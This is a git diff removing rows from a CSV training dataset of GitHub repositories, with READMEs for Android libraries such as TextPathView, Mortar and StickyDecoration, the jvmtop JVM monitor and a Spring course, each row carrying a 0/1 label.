diff --git "a/train.csv" "b/train.csv" --- "a/train.csv" +++ "b/train.csv" @@ -1,151023 +1,3 @@ -full_name,description,created_at,last_commit,readme,label -totond/TextPathView,A View with text path animation!,2018-01-10T10:36:47Z,,"# TextPathView - -![](https://img.shields.io/badge/JCenter-0.2.1-brightgreen.svg) - -
- - -
- - > [Go to the English README](https://github.com/totond/TextPathView/blob/master/README-en.md) - - -## 介绍 -  TextPathView是一个把文字转化为路径动画然后展现出来的自定义控件。效果如上图。 - - > 这里有[原理解析!](https://juejin.im/post/5a9677b16fb9a063375765ad) - -### v0.2.+重要更新 - - - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start,如上图二 - - 可以通过PathCalculator的子类来控制实现一些字路径变化,如下面的MidCalculator、AroundCalculator、BlinkCalculator - - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 - - ![TextPathView v0.2.+](https://raw.githubusercontent.com/totond/MyTUKU/master/textpathnew1.png) - -## 使用 -  主要的使用流程就是输入文字,然后设置一些动画的属性,还有画笔特效,最后启动就行了。想要自己控制绘画的进度也可以,详情见下面。 - -### Gradle - -``` -compile 'com.yanzhikai:TextPathView:0.2.1' -``` - - > minSdkVersion 16 - - > 如果遇到播放完后消失的问题,请关闭硬件加速,可能是硬件加速对`drawPath()`方法不支持 - -### 使用方法 - -#### TextPathView -  TextPathView分为两种,一种是每个笔画按顺序刻画的SyncTextPathView,一种是每个笔画同时刻画的AsyncTextPathView,使用方法都是一样,在xml里面配置属性,然后直接在java里面调用startAnimation()方法就行了,具体的可以看例子和demo。下面是一个简单的例子: - -xml里面: - -``` - - - - -``` - -java里面使用: - -``` - atpv1 = findViewById(R.id.atpv_1); - stpv_2017 = findViewById(R.id.stpv_2017); - - //从无到显示 - atpv1.startAnimation(0,1); - //从显示到消失 - stpv_2017.startAnimation(1,0); -``` - -还可以通过控制进度,来控制TextPathView显示,这里用SeekBar: - -``` - sb_progress.setOnSeekBarChangeListener(new SeekBar.OnSeekBarChangeListener() { - @Override - public void onProgressChanged(SeekBar seekBar, int progress, boolean fromUser) { - atpv1.drawPath(progress / 1000f); - stpv_2017.drawPath(progress / 1000f); - - } - } -``` - -#### PathView -  PathView是0.1.1版本之后新增的,拥有三个子类TextPathView、SyncPathView和AsyncPathView,前者上面有介绍是文字的路径,后面这两个就是图形的路径,必须要输入一个Path类,才能正常运行: - -``` -public class TestPath extends Path { - public TestPath(){ - init(); - } - - private void init() { - addCircle(350,300,150,Direction.CCW); - addCircle(350,300,100,Direction.CW); - addCircle(350,300,50,Direction.CCW); - moveTo(350,300); - lineTo(550,500); - } -} -``` - -``` - //必须先调用setPath设置路径 - aspv.setPath(new TestPath()); - aspv.startAnimation(0,1); -``` - 
-![](https://github.com/totond/MyTUKU/blob/master/textdemo2.gif?raw=true) -  (录屏可能有些问题,实际上是没有背景色的)上面就是SyncPathView和AsyncPathView效果,区别和文字路径是一样的。 - -### 属性 - -|**属性名称**|**意义**|**类型**|**默认值**| -|--|--|:--:|:--:| -|textSize | 文字的大小size | integer| 108 | -|text | 文字的具体内容 | String| Test| -|autoStart| 是否加载完后自动启动动画 | boolean| false| -|showInStart| 是否一开始就把文字全部显示 | boolean| false| -|textInCenter| 是否让文字内容处于控件中心 | boolean| false| -|duration | 动画的持续时间,单位ms | integer| 10000| -|showPainter | 在动画执行的时候是否执行画笔特效 | boolean| false| -|showPainterActually| 在所有时候是否展示画笔特效| boolean| false| -|~~textStrokeWidth~~ strokeWidth | 路径刻画的线条粗细 | dimension| 5px| -|~~textStrokeColor~~ pathStrokeColor| 路径刻画的线条颜色 | color| Color.black| -|paintStrokeWidth | 画笔特效刻画的线条粗细 | dimension| 3px| -|paintStrokeColor | 画笔特效刻画的线条颜色 | color| Color.black| -|repeat| 是否重复播放动画,重复类型| enum | NONE| -|fillColor| 文字动画结束时是否填充颜色 | boolean | false | - -|**repeat属性值**|**意义**| -|--|--| -|NONE|不重复播放| -|RESTART|动画从头重复播放| -|REVERSE|动画从尾重复播放| - - - > PS:showPainterActually属性,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false。因此最好用于使用非自带动画的时候。 - -### 方法 - -#### 画笔特效 - -``` - //设置画笔特效 - public void setPainter(SyncPathPainter painter); - //设置画笔特效 - public void setPainter(SyncPathPainter painter); -``` -  因为绘画的原理不一样,画笔特效也分两种: - -``` - public interface SyncPathPainter extends PathPainter { - //开始动画的时候执行 - void onStartAnimation(); - - /** - * 绘画画笔特效时候执行 - * @param x 当前绘画点x坐标 - * @param y 当前绘画点y坐标 - * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 - */ - @Override - void onDrawPaintPath(float x, float y, Path paintPath); - } - - public interface AsyncPathPainter extends PathPainter { - /** - * 绘画画笔特效时候执行 - * @param x 当前绘画点x坐标 - * @param y 当前绘画点y坐标 - * @param paintPath 画笔Path对象,在这里画出想要的画笔特效 - */ - @Override - void onDrawPaintPath(float x, float y, Path paintPath); - } -``` -  看名字就知道是对应哪一个了,想要自定义画笔特效的话就可以实现上面之中的一个或者两个接口来自己画啦。 -  另外,还有里面已经自带了3种画笔特效,可供参考和使用(关于这些画笔特效的实现,可以参考[原理解析](http://blog.csdn.net/totond/article/details/79375200)): - -``` - 
-//箭头画笔特效,根据传入的当前点与上一个点之间的速度方向,来调整箭头方向 -public class ArrowPainter implements SyncPathPainter { - -//一支笔的画笔特效,就是在绘画点旁边画多一支笔 -public class PenPainter implements SyncPathPainter,AsyncPathPainter { - -//火花特效,根据箭头引申变化而来,根据当前点与上一个点算出的速度方向来控制火花的方向 -public class FireworksPainter implements SyncPathPainter { - -``` - -  由上面可见,因为烟花和箭头画笔特效都需要记录上一个点的位置,所以只适合按顺序绘画的SyncTextPathView,而PenPainter就适合两种TextPathView。仔细看它的代码的话,会发现画起来都是很简单的哦。 - -#### 自定义画笔特效 -  自定义画笔特效也是非常简单的,原理就是在当前绘画点上加上一个附加的Path,实现SyncPathPainter和AsyncPathPainter之中的一个或者两个接口,重写里面的`onDrawPaintPath(float x, float y, Path paintPath)`方法就行了,如下面这个: - -``` - atpv2.setPathPainter(new AsyncPathPainter() { - @Override - public void onDrawPaintPath(float x, float y, Path paintPath) { - paintPath.addCircle(x,y,6, Path.Direction.CCW); - } - }); -``` -![](https://github.com/totond/MyTUKU/blob/master/textdemo3.gif?raw=true) - -#### 动画监听 - -``` - //设置自定义动画监听 - public void setAnimatorListener(PathAnimatorListener animatorListener); - -``` -  PathAnimatorListener是实现了AnimatorListener接口的类,继承它的时候注意不要删掉super父类方法,因为里面可能有一些操作。 - -#### 画笔获取 - -``` - //获取绘画文字的画笔 - public Paint getDrawPaint() { - return mDrawPaint; - } - - //获取绘画画笔特效的画笔 - public Paint getPaint() { - return mPaint; - } -``` - -#### 控制绘画 - -``` - /** - * 绘画文字路径的方法 - * - * @param start 路径开始点百分比 - * @param end 路径结束点百分比 - */ - public abstract void drawPath(float start, float end); - - /** - * 开始绘制路径动画 - * @param start 路径比例,范围0-1 - * @param end 路径比例,范围0-1 - */ - public void startAnimation(float start, float end); - - /** - * 绘画路径的方法 - * @param progress 绘画进度,0-1 - */ - public void drawPath(float progress); - - /** - * Stop animation - */ - public void stopAnimation(); - - /** - * Pause animation - */ - @RequiresApi(api = Build.VERSION_CODES.KITKAT) - public void pauseAnimation(); - - /** - * Resume animation - */ - @RequiresApi(api = Build.VERSION_CODES.KITKAT) - public void resumeAnimation(); -``` - -#### 填充颜色 - -``` - //直接显示填充好颜色了的全部文字 - public void showFillColorText(); - - 
//设置动画播放完后是否填充颜色 - public void setFillColor(boolean fillColor) -``` -  由于正在绘画的时候文字路径不是封闭的,填充颜色会变得很混乱,所以这里给出`showFillColorText()`来设置直接显示填充好颜色了的全部文字,一般可以在动画结束后文字完全显示后过渡填充 - -![](https://github.com/totond/MyTUKU/blob/master/textdemo4.gif?raw=true) - - - - - -#### 取值计算器 - -​ 0.2.+版本开始,加入了取值计算器PathCalculator,可以通过`setCalculator(PathCalculator calculator)`方法设置。PathCalculator可以控制路径的起点start和终点end属性在不同progress对应的取值。TextPathView自带一些PathCalculator子类: - -- **MidCalculator** - - start和end从0.5开始往两边扩展: - -![MidCalculator](https://github.com/totond/MyTUKU/blob/master/text4.gif?raw=true) - -- **AroundCalculator** - - start会跟着end增长,end增长到0.75后start会反向增长 - -![AroundCalculator](https://github.com/totond/MyTUKU/blob/master/text5.gif?raw=true) - -- **BlinkCalculator** - - start一直为0,end自然增长,但是每增加几次会有一次end=1,造成闪烁 - -![BlinkCalculator](https://github.com/totond/MyTUKU/blob/master/text2.gif?raw=true) - -- **自定义PathCalculator:**用户可以通过继承抽象类PathCalculator,通过里面的`setStart(float start)`和`setEnd(float end)`,具体可以参考上面几个自带的PathCalculator实现代码。 - -#### 其他 - -``` - //设置文字内容 - public void setText(String text); - - //设置路径,必须先设置好路径在startAnimation(),不然会报错! 
- public void setPath(Path path) ; - - //设置字体样式 - public void setTypeface(Typeface typeface); - - //清除画面 - public void clear(); - - //设置动画时能否显示画笔效果 - public void setShowPainter(boolean showPainter); - - //设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动设置为false - public void setCanShowPainter(boolean canShowPainter); - - //设置动画持续时间 - public void setDuration(int duration); - - //设置重复方式 - public void setRepeatStyle(int repeatStyle); - - //设置Path开始结束取值的计算器 - public void setCalculator(PathCalculator calculator) - -``` - -## 更新 - - - 2018/03/08 **version 0.0.5**: - - 增加了`showFillColorText()`方法来设置直接显示填充好颜色了的全部文字。 - - 把PathAnimatorListener从TextPathView的内部类里面解放出来,之前使用太麻烦了。 - - 增加`showPainterActually`属性,设置所有时候是否显示画笔效果,由于动画绘画完毕应该将画笔特效消失,所以每次执行完动画都会自动将它设置为false。因此它用处就是在不使用自带Animator的时候显示画笔特效。 - - - 2018/03/08 **version 0.0.6**: - - 增加了`stop(), pause(), resume()`方法来控制动画。之前是觉得让使用者自己用Animator实现就好了,现在一位外国友人[toanvc](https://github.com/toanvc)提交的PR封装好了,我稍作修改,不过后两者使用时API要大于等于19。 - - 增加了`repeat`属性,让动画支持重复播放,也是[toanvc](https://github.com/toanvc)同学的PR。 - - - 2018/03/18 **version 0.1.0**: - - 重构代码,加入路径动画SyncPathView和AsyncPathView,把总父类抽象为PathView - - 增加`setDuration()`、`setRepeatStyle()` - - 修改一系列名字如下: - -|Old Name|New Name| -|---|---| -|TextPathPainter|PathPainter| -|SyncTextPainter|SyncPathPainter| -|AsyncTextPainter|AsyncPathPainter| -|TextAnimatorListener|PathAnimatorListener| - - - 2018/03/21 **version 0.1.2**: - - 修复高度warp_content时候内容有可能显示不全 - - 原来PathMeasure获取文字Path时候,最后会有大概一个像素的缺失,现在只能在onDraw判断progress是否为1来显示完全路径(但是这样可能会导致硬件加速上显示不出来,需要手动关闭这个View的硬件加速) - - 增加字体设置 - - 支持自动换行 - -![](https://github.com/totond/MyTUKU/blob/master/textdemo5.gif?raw=true) - - - 2018/09/09 **version 0.1.3**: - - 默认关闭此控件的硬件加速 - - 加入内存泄漏控制 - - 准备后续优化 -- 2019/04/04 **version 0.2.1**: - - 现在不但可以控制文字路径结束位置end,还可以控制开始位置start - - 可以通过PathCalculator的子类来控制实现一些字路径变化,如上面的MidCalculator、AroundCalculator、BlinkCalculator - - 可以通知直接设置FillColor属性来控制结束时是否填充颜色 - - 硬件加速问题解决,默认打开 - - 去除无用log和报错 - - -#### 后续将会往下面的方向努力: - - - 
更多的特效,更多的动画,如果有什么想法和建议的欢迎issue提出来一起探讨,还可以提交PR出一份力。 - - 更好的性能,目前单个TextPathView在模拟器上运行动画时是不卡的,多个就有一点点卡顿了,在性能较好的真机多个也是没问题的,这个性能方面目前还没头绪。 - - 文字换行符支持。 - - Path的宽高测量(包含空白,从坐标(0,0)开始) - - -## 贡献代码 -  如果想为TextPathView的完善出一份力的同学,欢迎提交PR: - - 首先请创建一个分支branch。 - - 如果加入新的功能或者效果,请不要覆盖demo里面原来用于演示Activity代码,如FristActivity里面的实例,可以选择新增一个Activity做演示测试,或者不添加演示代码。 - - 如果修改某些功能或者代码,请附上合理的依据和想法。 - - 翻译成English版README(暂时没空更新英文版) - -## 开源协议 -  TextPathView遵循MIT协议。 - -## 关于作者 - > id:炎之铠 - - > 炎之铠的邮箱:yanzhikai_yjk@qq.com - - > CSDN:http://blog.csdn.net/totond - - - - - - -",0 -unofficial-openjdk/openjdk,Do not send pull requests! Automated Git clone of various OpenJDK branches,2012-08-09T20:39:52Z,,"This repository is no longer actively updated. Please see https://github.com/openjdk for a much better mirror of OpenJDK! -",0 -square/mortar,"A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.",2013-11-09T00:01:50Z,,"# Mortar - -## Deprecated - -Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/). - -## What's a Mortar? - -Mortar provides a simplified, composable overlay for the Android lifecycle, -to aid in the use of [Views as the modular unit of Android applications][rant]. -It leverages [Context#getSystemService][services] to act as an a la carte supplier -of services like dependency injection, bundle persistence, and whatever else -your app needs to provide itself. - -One of the most useful services Mortar can provide is its [BundleService][bundle-service], -which gives any View (or any object with access to the Activity context) safe access to -the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp] -pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService. 
-Presenters are completely isolated from View concerns. They're particularly good at -surviving configuration changes, weathering the storm as Android destroys your portrait -Activity and Views and replaces them with landscape doppelgangers. - -Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2] -Components) visible as system services. Or not — these services are -completely decoupled. - -Everything is managed by [MortarScope][scope] singletons, typically -backing the top level Application and Activity contexts. You can also spawn -your own shorter lived scopes to manage transient sessions, like the state of -an object being built by a set of wizard screens. - - - -These nested scopes can shadow the services provided by higher level scopes. -For example, a [Dagger extension graph][ogplus] specific to your wizard session -can cover the one normally available, transparently to the wizard Views. -Calls like `ObjectGraphService.inject(getContext(), this)` are now possible -without considering which graph will do the injection. - -## The Big Picture - -An application will typically have a singleton MortarScope instance. -Its job is to serve as a delegate to the app's `getSystemService` method, something like: - -```java -public class MyApplication extends Application { - private MortarScope rootScope; - - @Override public Object getSystemService(String name) { - if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName()); - - return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); - } -} -``` - -This exposes a single, core service, the scope itself. From the scope you can -spawn child scopes, and you can register objects that implement the -[Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18) -interface with it for setup and tear-down calls. 
- - * `Scoped#onEnterScope(MortarScope)` - * `Scoped#onExitScope(MortarScope)` - -To make a scope provide other services, like a [Dagger ObjectGraph][og], -you register them while building the scope. That would make our Application's -`getSystemService` method look like this: - -```java - @Override public Object getSystemService(String name) { - if (rootScope == null) { - rootScope = MortarScope.buildRootScope() - .with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule())) - .build(getScopeName()); - } - - return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); - } -``` - -Now any part of our app that has access to a `Context` can inject itself: - -```java -public class MyView extends LinearLayout { - @Inject SomeService service; - - public MyView(Context context, AttributeSet attrs) { - super(context, attrs); - ObjectGraphService.inject(context, this); - } -} -``` - -To take advantage of the BundleService describe above, you'll put similar code -into your Activity. If it doesn't exist already, you'll -build a sub-scope to back the Activity's `getSystemService` method, and -while building it set up the `BundleServiceRunner`. You'll also notify -the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are -called, to make the persistence bundle available to the rest of the app. - -```java -public class MyActivity extends Activity { - private MortarScope activityScope; - - @Override public Object getSystemService(String name) { - MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName()); - - if (activityScope == null) { - activityScope = MortarScope.buildChild(getApplicationContext()) // - .withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner()) - .withService(HelloPresenter.class.getName(), new HelloPresenter()) - .build(getScopeName()); - } - - return activityScope.hasService(name) ? 
activityScope.getService(name) - : super.getSystemService(name); - } - - @Override protected void onCreate(Bundle savedInstanceState) { - super.onCreate(savedInstanceState); - BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState); - setContentView(R.layout.main_view); - } - - @Override protected void onSaveInstanceState(Bundle outState) { - super.onSaveInstanceState(outState); - BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState); - } -} -``` - -With that in place, any object in your app can sign up with the `BundleService` -to save and restore its state. This is nice for views, since Bundles are less -of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`, -and a boon to any business objects in the rest of your app. - -Download --------- - -Download [the latest JAR][jar] or grab via Maven: - -```xml - - com.squareup.mortar - mortar - (insert latest version) - -``` - -Gradle: - -```groovy -compile 'com.squareup.mortar:mortar:(latest version)' -``` - -## Full Disclosure - -This stuff has been in ""rapid"" development over a pretty long gestation period, -but is finally stabilizing. We don't expect drastic changes before cutting a -1.0 release, but we still cannot promise a stable API from release to release. - -Mortar is a key component of multiple Square apps, including our flagship -[Square Register][register] app. - -License --------- - - Copyright 2013 Square, Inc. - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
- See the License for the specific language governing permissions and - limitations under the License. - -[bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java -[mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter -[dagger]: http://square.github.io/dagger/ -[dagger2]: http://google.github.io/dagger/ -[jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST -[og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html -[ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96 -[presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java -[rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html -[register]: https://play.google.com/store/apps/details?id=com.squareup -[scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java -[services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String) -",0 -joyoyao/superCleanMaster,[DEPRECATED] ,2015-02-12T03:37:41Z,,"# superCleanMaster -superCleanMaster is deprecated Thanks for all your support! - - -",0 -frogermcs/GithubClient,Example of Github API client implemented on top of Dagger 2 DI framework. ,2015-05-27T16:43:03Z,,"# GithubClient -Example of Github API client implemented on top of Dagger 2 DI framework. 
- -This code was created as an example for Dependency Injection with Dagger 2 series on my dev-blog: - -- [Introdution to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/) -- [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/) -- [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/) -- [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/) -- [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/) -- [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/) - -This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/ -",1 -patric-r/jvmtop,"Java monitoring for the command-line, profiler included",2015-07-14T12:58:49Z,,"jvmtop is a lightweight console application to monitor all accessible, running jvms on a machine.
-In a top-like manner, it displays JVM internal metrics (e.g. memory information) of running Java processes.
-
-Jvmtop also includes a CPU console profiler.
-
-It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.
-Jvmtop requires a JDK - a JRE will not suffice.
-
-Please note that it's currently in an alpha state -
-if you experience an issue or need further help, please let us know.
-
-Jvmtop is open-source. Check out the source code. Patches are very welcome!
-
-Also have a look at the documentation or at a captured live-example.
- -``` - JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12 - https://github.com/patric-r/jvmtop - - PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL - 3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21 -11272 ver.resin.Resin [ERROR: Could not attach to VM] -27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31 -19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20 -16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46 -``` - -
- -

Installation

-Click on the releases tab, download the -most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.

-Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL) - - - -

08/14/2013 jvmtop 0.8.0 released

-Changes: - - -Full changelog - -
- -In VM detail mode it shows you the top CPU-consuming threads, beside detailed metrics:
-
-
- -``` - JvmTop 0.8.0 alpha amd64, 4 cpus, Linux 2.6.18-34 - https://github.com/patric-r/jvmtop - - PID 3539: org.apache.catalina.startup.Bootstrap - ARGS: start - VMARGS: -Djava.util.logging.config.file=/home/webserver/apache-tomcat-5.5[...] - VM: Sun Microsystems Inc. Java HotSpot(TM) 64-Bit Server VM 1.6.0_25 - UP: 869:33m #THR: 106 #THRPEAK: 143 #THRCREATED: 128020 USER: webserver - CPU: 4.55% GC: 3.25% HEAP: 137m / 227m NONHEAP: 75m / 304m - TID NAME STATE CPU TOTALCPU BLOCKEDBY - 25 http-8080-Processor13 RUNNABLE 4.55% 1.60% - 128022 RMI TCP Connection(18)-10.101. RUNNABLE 1.82% 0.02% - 36578 http-8080-Processor164 RUNNABLE 0.91% 2.35% - 36453 http-8080-Processor94 RUNNABLE 0.91% 1.52% - 27 http-8080-Processor15 RUNNABLE 0.91% 1.81% - 14 http-8080-Processor2 RUNNABLE 0.91% 3.17% - 128026 JMX server connection timeout TIMED_WAITING 0.00% 0.00% -``` - -Pull requests / bug reports are always welcome.
-
-",0 -Gavin-ZYX/StickyDecoration,,2017-05-31T07:38:49Z,,"# StickyDecoration -利用`RecyclerView.ItemDecoration`实现顶部悬浮效果 - -![效果](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip) - -## 支持 -- **LinearLayoutManager** -- **GridLayoutManager** -- **点击事件** -- **分割线** - -## 添加依赖 -项目要求: `minSdkVersion` >= 14. -在你的`build.gradle`中 : -```gradle -repositories { - maven { url 'https://jitpack.io' } -} -dependencies { - compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1' -} -``` - -**最新版本** -[![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration) - -## 使用 - -#### 文字悬浮——StickyDecoration -> **注意** -使用recyclerView.addItemDecoration()之前,必须先调用recyclerView.setLayoutManager(); - -代码: -```java -GroupListener groupListener = new GroupListener() { - @Override - public String getGroupName(int position) { - //获取分组名 -        return mList.get(position).getProvince(); - } -}; -StickyDecoration decoration = StickyDecoration.Builder - .init(groupListener) - //重置span(使用GridLayoutManager时必须调用) - //.resetSpan(mRecyclerView, (GridLayoutManager) manager) - .build(); -... 
-mRecyclerView.setLayoutManager(manager); -//需要在setLayoutManager()之后调用addItemDecoration() -mRecyclerView.addItemDecoration(decoration); -``` -效果: - -![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip) - -![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) - - -**支持的方法:** - -| 方法 | 功能 | 默认 | -|-|-|-| -| setGroupBackground | 背景色 | #48BDFF | -| setGroupHeight | 高度 | 120px | -| setGroupTextColor | 字体颜色 | Color.WHITE | -| setGroupTextSize | 字体大小 | 50px | -| setDivideColor | 分割线颜色 | #CCCCCC | -| setDivideHeight | 分割线高宽度 | 0 | -| setTextSideMargin | 边距(靠左时为左边距 靠右时为右边距) | 10 | -| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | -| setSticky | 是否需要吸顶效果 | true | - -|方法|功能|描述| -|-|-|-| -| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position | -| resetSpan | 重置 | 使用GridLayoutManager时必须调用 | - -### 自定义View悬浮——PowerfulStickyDecoration - -先创建布局`item_group` -```xml - - - - - - - -``` -创建`PowerfulStickyDecoration`,实现自定`View`悬浮 -```java -PowerGroupListener listener = new PowerGroupListener() { - @Override - public String getGroupName(int position) { - return mList.get(position).getProvince(); - } - - @Override - public View getGroupView(int position) { - //获取自定定义的组View - View view = getLayoutInflater().inflate(R.layout.item_group, null, false); - ((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince()); - return view; - } -}; -PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder - .init(listener) - //重置span(注意:使用GridLayoutManager时必须调用) - //.resetSpan(mRecyclerView, (GridLayoutManager) manager) - .build(); - - ... 
-mRecyclerView.addItemDecoration(decoration); -``` -效果: - -![效果](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip) - -**支持的方法:** - -| 方法 | 功能 | 默认 | -| -- | -- | -- | -| setGroupHeight | 高度 | 120px | -| setGroupBackground | 背景色 | #48BDFF | -| setDivideColor | 分割线颜色 | #CCCCCC | -| setDivideHeight | 分割线高宽度 | 0 | -| setCacheEnable | 是否使用缓存| 使用缓存 | -| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 | -| setSticky | 是否需要吸顶效果 | true | - -|方法|功能|描述| -|-|-|-| -| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position以及对应的viewId | -| resetSpan | 重置span |使用GridLayoutManager时必须调用 | -| notifyRedraw | 通知重新绘制 | 使用场景:网络图片加载后调用方法使用) | -| clearCache | 清空缓存 | 在使用缓存的情况下,数据改变时需要清理缓存 | - -**Tips** - -1、若使用网络图片时,在图片加载完成后需要调用 -```java -decoration.notifyRedraw(mRv, view, position); -``` - -2、使用缓存时,若数据源改变,需要调用clearCache清除数据 - -3、点击事件穿透问题,参考demo中MyRecyclerView。[issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37) - -# 更新日志 - ------------------------------ 1.6.0 (2022-8-21)---------------------------- - -- fix:取消缓存无效问题 -- 迁移仓库 -- 迁移到Androidx - ------------------------------ 1.5.3 (2020-12-15)---------------------------- - -- 支持是否需要吸顶效果 - ------------------------------ 1.5.2 (2019-9-3)---------------------------- - -- fix:特殊情况下,吸顶效果不佳问题 - ------------------------------ 1.5.1 (2019-8-8)---------------------------- - -- fix:setHeaderCount导致显示错乱问题 - ------------------------------ 1.5.0 (2019-6-17)---------------------------- - -- fix:GridLayoutManager刷新后数据混乱问题 - ------------------------------ 1.4.12 (2019-5-8)---------------------------- - -- fix:setDivideColor不生效问题 - ------------------------------ 1.4.9 (2018-10-9)---------------------------- - -- fix:由于添加header导致的一些问题 - ------------------------------ 1.4.8 (2018-08-26)---------------------------- - -- 顶部悬浮栏点击事件穿透问题:提供处理方案 - ------------------------------ 1.4.7 (2018-08-16)---------------------------- - -- fix:数据变化后,布局未刷新问题 - ------------------------------ 1.4.6 
(2018-07-29)---------------------------- - -- 修改缓存方式 -- 加入性能检测 - ------------------------------ 1.4.5 (2018-06-17)---------------------------- - -- 在GridLayoutManager中使用setHeaderCount方法导致布局错乱问题 - ------------------------------ 1.4.4 (2018-06-2)---------------------------- - -- 添加setHeaderCount方法 -- 修改README -- 修复bug - ------------------------------ 1.4.3 (2018-05-27)---------------------------- - -- 修复一些bug,更改命名 - ------------------------------ 1.4.2 (2018-04-2)---------------------------- - -- 增强点击事件,现在可以得到悬浮条内View点击事件(没有设置id时,返回View.NO_ID) - -- 修复加载更多返回null崩溃或出现多余的悬浮Item问题(把加载更多放在Item中的加载方式) - ------------------------------ 1.4.1 (2018-03-21)---------------------------- - -- 默认取消缓存,避免数据改变时显示出问题 - -- 添加clearCache方法用于清理缓存 - ------------------------------ 1.4.0 (2018-03-04)---------------------------- - -- 支持异步加载后的重新绘制(如网络图片加载) - -- 优化缓存 - -- 优化GridLayoutManager的分割线 - ------------------------------ 1.3.1 (2018-01-30)---------------------------- - -- 修改测量方式 - ------------------------------ 1.3.0 (2018-01-28)---------------------------- - -- 删除isAlignLeft()方法,需要靠右时,直接在布局中处理就可以了。 - -- 优化缓存机制。 -",0 -in28minutes/spring-master-class,"An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.",2017-08-07T06:56:45Z,,"# Spring Master Class - Journey from Beginner to Expert - -[![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png ""Spring Master Class - Beginner to Expert"")](https://www.udemy.com/course/spring-tutorial-for-beginners/) - - -Learn the magic of Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey. 
